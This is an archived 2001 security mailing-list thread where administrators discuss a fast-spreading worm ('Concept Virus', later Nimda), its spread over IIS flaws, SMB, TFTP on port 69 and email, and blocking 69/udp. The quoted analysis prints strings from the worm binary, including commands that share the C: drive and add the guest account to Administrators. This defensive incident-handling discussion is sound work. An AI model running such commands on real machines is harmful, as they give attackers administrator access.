Security Incidents mailing list archives
RE: Concept Virus(CV) V.5 - Advisory and Quick analysis
From: "Robert Nieuwhof" <RNieuwhof () nos com>
Date: Tue, 18 Sep 2001 14:00:36 -0700
Have you indeed confirmed that the worm utilizes port 69? If so, how was this confirmed and will you please share the criteria and results of your confirmational testing? Thanks, Robert J. Nieuwhof, CNA, MCP mailto:Rnieuwhof () nos com Network Engineer NOS Communications - Information Services http://www.nos.com Madness takes its toll. Please have exact change. The information contained in this correspondence is confidential and intended for the use of the individual or entity named above. Unauthorized distribution is prohibited. Any and all opinions expressed, are the opinions of the author of this e-mail, and in no way reflect or imply the opinions of NOS Communications. -----Original Message----- From: Dave Sill [mailto:davids () socket net] Sent: Tuesday, September 18, 2001 11:13 AM To: Grady Fox Cc: incidents () securityfocus com Subject: Re: Concept Virus(CV) V.5 - Advisory and Quick analysis We've blocked 69/udp at our internal and border routers both incoming and outgoing. Be careful with your private networks. Our tech support department contracted this bug by opening a web page of an infected customer in response to a complaint about performance. Dave Sill Server Admin Socket Internet Services davids () socket net On Tuesday 18 September 2001 15:10, you wrote:
YES --- Dave Sill <davids () socket net> wrote:You say that the worm gets a payload by tftp... Is it using port 69? Thanks, Dave Sill Server Admin Socket Internet Services davids () socket net Is the worm On Tuesday 18 September 2001 10:47, you wrote:Hi all! We've all just been hit by a VERY aggressiveworm/virus.Quick analysis indicates that it propagates itselfina number of different ways: Through use of IIS UNICODE direcory traversalcoupledwith the recent IIS .dll privilege escalationattack.It uses SMB/CIFS and TFTP to get the worm payload. Through MAPI mails (probably to all ofaddressbook).Other ways of spreading may be possible, but wehaven'tyet had the time to properly analyse theworm/virus.It seems to share "c:\" via SMB/CIFS as "c$" and the worm/virus also adds the "Guest" user and"Guests"group to the local "Administrators" group.... Interesting strings in binary: Concept Virus(CV) V.5, Copyright(C)2001 R.P.ChinaSYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Securityshare c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add net More info as we come upon it..... /olle
---------------------------------------------------------------------------
- This list is provided by the SecurityFocus ARISanalyzer service.For more information on this free incidenthandling, managementand tracking system please see:http://aris.securityfocus.com
---------------------------------------------------------------------------
-This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com__________________________________________________ Terrorist Attacks on U.S. - How can you help? Donate cash, emergency relief information http://dailynews.yahoo.com/fc/US/Emergency_Information/
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com [INFO] -- Virus Manager: This email message and any attachments have been scanned for viruses and are believed to be free of any virus. This email, including any attached files, is confidential and is for the sole use of the individual or entity for whom it is intended. This email represents the originators personal views and opinions, which do not necessarily reflect those of this Company. If you are not the intended recipient of this email, be advised that you have received this email in error. Any use, dissemination, forwarding, printing, or copying of this email is strictly prohibited and may be subject to legal sanction. If you have received this email in error, please immediately notify postmaster () sitehelp org . This email and any attachments have been scanned for viruses and are believed to be free of any virus or defect that might affect any computer system into which it is received. However, it is the responsibility of the recipient to ensure that it is virus free and no responsibility or liability is accepted by this Company for loss or damage arising from its use. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Concept Virus(CV) V.5 - Quick analysis update, (continued)
- Concept Virus(CV) V.5 - Quick analysis update Olle Segerdahl (Sep 18)
- A suggestion to Concept/Nimda analysts Stuart Staniford (Sep 18)
- Re: Concept Virus(CV) V.5 - Quick analysis update Brian Pomeroy (Sep 18)
- Re: Concept Virus(CV) V.5 - Quick analysis update Homer Wilson Smith (Sep 18)
- Re: Concept Virus(CV) V.5 - Quick analysis update Michael H. Warfield (Sep 18)
- Concept Virus(CV) V.5 - Quick analysis update Olle Segerdahl (Sep 18)
- Re: Concept Virus(CV) V.5 - Advisory and Quick analysis Jose Nazario (Sep 18)
- Re: Concept Virus(CV) V.5 - Advisory and Quick analysis Michael H. Warfield (Sep 18)
- RE: Concept Virus(CV) V.5 - Advisory and Quick analysis Mark Challender (Sep 18)
- RE: Concept Virus(CV) V.5 - Advisory and Quick analysis Mark Challender (Sep 18)
- Re: Concept Virus(CV) V.5 - Advisory and Quick analysis Dave Sill (Sep 18)
- RE: Concept Virus(CV) V.5 - Advisory and Quick analysis Robert Nieuwhof (Sep 18)
- RE: Concept Virus(CV) V.5 - Advisory and Quick analysis Davis, Matt (Sep 19)